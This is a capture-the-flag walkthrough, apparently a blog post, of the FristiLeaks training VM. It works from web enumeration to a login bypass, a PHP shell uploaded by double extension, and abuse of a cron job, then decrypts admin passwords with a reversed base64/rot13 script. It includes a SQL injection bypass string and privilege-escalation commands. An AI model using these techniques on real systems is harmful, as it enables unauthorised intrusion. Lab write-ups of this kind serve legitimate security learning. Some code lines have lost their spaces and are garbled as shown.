Cool, I see there is a web server running on the HTTP default port. On browsing port 80, it brought this page on the screen.

Finding Clues

Interesting. But this page didn’t have anything special. So I checked the source code of the page. There was a comment.

PHP

1

2

3

4

<!--

Welcome to #Fristleaks, a quick hackme VM by @Ar0xA Goal: get UID 0 (root) and

read the special flag file. Timeframe: should be doable in 4 hours.

-->

But, It was not something I was looking for. However, I followed the source of the image on the homepage and it leads me to images directory. Which had two images.

3037440.jpgkeep-calm.png

I could see where keep-calm was being used. But what about the other image?

To find my answers, I started looking for some place where this image was actually being used.

Robots.txt

I checked for robots.txt file. And luckily it was there.

robots.txt

1

2

3

4

User-agent:*

Disallow:/cola

Disallow:/sisi

Disallow:/beer

All these directories had nothing other than that image. Disappointment! But, I knew there was something about these urls… They are all names of drinks. And looking at keep-calm image; it says

Keep calmn and drink Fristi

Drink Fristi? A drink? Just like beer, Sisi and Cola?

It clicked my mind and I tried this url

192.168.0.102/firsti/

And voila! I found a login panel here.

Fristi Login panel

This admin portal brought up a whole new challenge. I had to bypass this authentication somehow. I tried SQL Injection Authentication Bypass Queries like

‘or’1’=’1

And likewise, but, login script was sanitizing input properly. Hence. No luck with SQL Injection. After a few failed SQL Injection attempts, I moved on to try something else.

Sometimes, due to to poor session management, there is a possibility to access private files without authentication. For example admin/dashboard.php is for admins, but they are redirected to login form automatically if there is no session. However, we can try blocking this redirect manually and see if we can see the content of dashboard.php.

Bypass Attempt – Blocking HTTP Redirect

Before using this method, I had to know about actual admin files first. So I started guessing common file names like

dashboard.php

admin.php

home.php

loggedin.php

upload.php

submit.php

And I found one. upload.php worked for me. It was redirecting me back to main_login.php file. So, I fired up my Firefox and installed an add-on NoRedirect, added a no-redirect rule for main_login.php file, browsed upload.php again and voila! I was provided with a file upload form.

Bypassing Admin Area

Awesome. But, the sad part is I couldn’t upload PHP shell as this upload script was accepting only files with image extensions. After few failed attempts. I gave up and started looking for a proper login session.

Bypassing Attempt – using clues

Before using that redirect blocker, I found some useful information in the source code also. There was a commented out text in the login page source.

User comment found in login page

PHP

1

2

3

4

5

6

<!--

TODO:

We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz

-->

eezeepz?

Yeah Right. I know what you’re thinking. A possible username? I thought if username is given here, then It’s quite possible that the password is also hidden somewhere – waiting to be found. So I kept reading source code, looking for clues. I noticed the image displayed on the login form was stored in base64 data string. And right after this image there was another base64 string but It was commented out.

And It was just another file. To keep things going faster, I fired up firebug and replaced login page image source with this string and result was something like

Grabbing Password

The resultant image gave me this string

password

1

keKkeKKeKKeKkEkkEk

Which is no wonder our password. After having both username and password, made a login attempt and I was redirected to login_success.php.

Super! But, I was disappointed. I thought there would be more modules available if I logged with a proper session. But nothing unknown was found. The same old upload module to which I already had access.

Now, I was sure if there was a way, It’s a way through upload.php. I added another extension “jpg” to the shell and tried to access it then and voila! A Lovely Shell was waiting for me to take control over the server.

Take Over!

I found mysql credentials in checklogin.php file

MySQL Credentials

PHP

1

2

3

4

5

$host="localhost";// Host name

$username="eezeepz";// Mysql username

$password="4ll3maal12#";// Mysql password

$db_name="hackmenow";// Database name

$tbl_name="members";// Table name

Inspecting database

After logging in to mysql server with given credentials, I could only find a single table “members” with only 1 record. Which I already knew. No surprises there.

Gathering more clues..

I started a reverse shell on the server for better command results. And while going through different directories, I came across an interesting file “notes.txt” in /home/eezeepz/ directory.

Shell

Shell

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

ls /home

admin

eezeepz

fristigod

ls /home/firstigod

ls: cannot access /home/firstigod: No such file or directory

ls /home/fristigod

ls: cannot open directory /home/fristigod: Permission denied

ls /home/admin

ls: cannot open directory /home/admin: Permission denied

ls /home/eezeepz

MAKEDEV

cbq

cciss_id

cfdisk

chcpu

chgrp

chkconfig

chmod

chown

clock

consoletype

cpio

cryptsetup

ctrlaltdel

cut

halt

hostname

hwclock

kbd_mode

kill

killall5

kpartx

nameif

nano

netreport

netstat

new-kernel-pkg

nice

nisdomainname

nologin

notes.txt

tar

taskset

tc

telinit

touch

tracepath

tracepath6

true

tune2fs

weak-modules

wipefs

xfs_repair

ypdomainname

zcat

zic

All other files were either useless or not accessible with current rights.

notes.txt

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

Yo EZ,

I made it possible for you to do some automated checks,

but I did only allow you access to /usr/bin/* system binaries. I did

however copy a few extra often needed commands to my

homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those

from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The

output goes to the file "cronresult" in /tmp/. It should

run every minute with my account privileges.

- Jerry

Wow! Seriously? Let’s do something with your given rights b***h 😎

Taking down Admin Home

As instructed, I added runthis file in /tmp and added following command

shell

Shell

1

echo/home/admin/chmod-R0777/home/admin>>/tmp/runthis

And after sometime, cronresult file was there

cronresult

Shell

1

executing:/home/admin/chmod-R0777/home/admin

Amazingly, I could access /home/admin directory with my current user then. Admin user had some very interesting files there. There were cryptedpass.txt whoisyourgod.txt and cryptpass.py files. I believe cryptedpass.txt was cipher text generated by the cryptpass.py script. So I looked into the script

cryptpass.py

Python

1

2

3

4

5

6

7

8

9

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn

importbase64,codecs,sys

defencodeString(str):

base64string=base64.b64encode(str)

returncodecs.encode(base64string[::-1],'rot13')

cryptoResult=encodeString(sys.argv[1])

printcryptoResul

I moved on to test it.

testing

Shell

1

2

python/home/admin/cryptpass.pyHelloWorld!

=RPMfW3oK9TofITF

Cool. It generated a crypted password for me. However, the script is using rot13 and base64 algorithms (both are reversible). So all I had to do was reversing the algorithms which was pretty easy. I modified the original script as following:

decrypt.py

Python

1

2

3

4

5

6

#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn

importbase64,codecs,sys

defdecodePass(str):

rot13str=codecs.decode(str[::-1],'rot13')

returnbase64.b64decode(rot13str)

printdecodePass(sys.argv[1])

And to test the result if it was working fine:

Testing Decryption

Shell

1

2

3

4

5

6

python/home/admin/cryptpass.pyhelloWorld!

=RPMfW3oK9TofITn

python/home/decrypt.py=RPMfW3oK9TofITn

python:can't open file '/home/decrypt.py':[Errno2]No such fileordirectory

python/home/admin/decrypt.py=RPMfW3oK9TofITn

helloWorld!

Awesome! Everything was in order. Now It’s time to decrypt other passwords and try SU.

Decrypting passwords

1

2

3

4

5

6

7

8

9

10

11

12

sh-4.1$cat cryptedpass.txt

cat cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq

sh-4.1$python decrypt.py mVGZ3O3omkJLmy2pcuTq

python decrypt.py mVGZ3O3omkJLmy2pcuTq

thisisalsopw123

cat whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

sh-4.1$python decrypt.py=RFn0AKnlMHMPIzpyuTI0ITG

python decrypt.py=RFn0AKnlMHMPIzpyuTI0ITG

LetThereBeFristi!

sh-4.1$

And after trying these passwords on different users, I was able to login fristygod user.